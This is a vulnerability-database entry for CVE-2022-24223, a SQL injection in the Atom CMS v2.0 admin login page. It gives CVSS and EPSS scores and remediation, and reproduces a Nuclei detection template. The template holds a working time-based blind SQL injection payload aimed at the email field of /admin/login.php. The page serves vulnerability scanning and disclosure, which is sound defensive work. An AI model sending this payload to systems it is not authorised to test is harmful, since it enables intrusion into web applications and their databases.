Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2022-24223
HistoryApr 21, 2023 - 8:56 a.m.

Atom CMS v2.0 - SQL Injection

2023-04-2108:56:01
ProjectDiscovery
github.com
6
cve
cve2022
packetstorm
sqli
atom
cms
thedigitalcraft
sql
injection
unauthorized
access
data
leakage
manipulation
exploitation
fixed
version.

7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

0.34 Low

EPSS

Percentile

97.1%

AtomCMS v2.0 was discovered to contain a SQL injection vulnerability via /admin/login.php.
id: CVE-2022-24223

info:
  name: Atom CMS v2.0 - SQL Injection
  author: theamanrawat
  severity: critical
  description: |
    AtomCMS v2.0 was discovered to contain a SQL injection vulnerability via /admin/login.php.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
  remediation: Fixed in version Atom CMS v2.1
  reference:
    - https://packetstormsecurity.com/files/165922/Atom-CMS-2.0-SQL-Injection.html
    - https://github.com/thedigicraft/Atom.CMS/issues/255
    - https://nvd.nist.gov/vuln/detail/CVE-2022-24223
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/Enes4xd/Enes4xd
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-24223
    cwe-id: CWE-89
    epss-score: 0.27442
    epss-percentile: 0.96689
    cpe: cpe:2.3:a:thedigitalcraft:atomcms:2.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: thedigitalcraft
    product: atomcms
  tags: cve,cve2022,packetstorm,sqli,atom,cms,thedigitalcraft

http:
  - raw:
      - |
        @timeout: 10s
        POST /admin/login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        email={{randstr}}@gmail.com'+AND+(SELECT+2549+FROM+(SELECT(SLEEP(6)))LIzI)+AND+'uqzM'='uqzM&password={{randstr}}

    matchers:
      - type: dsl
        dsl:
          - 'duration>=6'
          - 'status_code == 200'
          - 'contains(body, "Admin Login") && contains(body, "Atom.SaveOnBlur")'
        condition: and
# digest: 4b0a00483046022100b30222427f9ffd0bdc3e9c961d2d43e58bcaaa1c01926b6710eb7a2c2eec31a2022100f35d98eab9372172d960a8d2af85b2b0160b92776eb2f797098acd5ee6cd32fd:922c64590222798bb761d5b6d8e72950

7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

0.34 Low

EPSS

Percentile

97.1%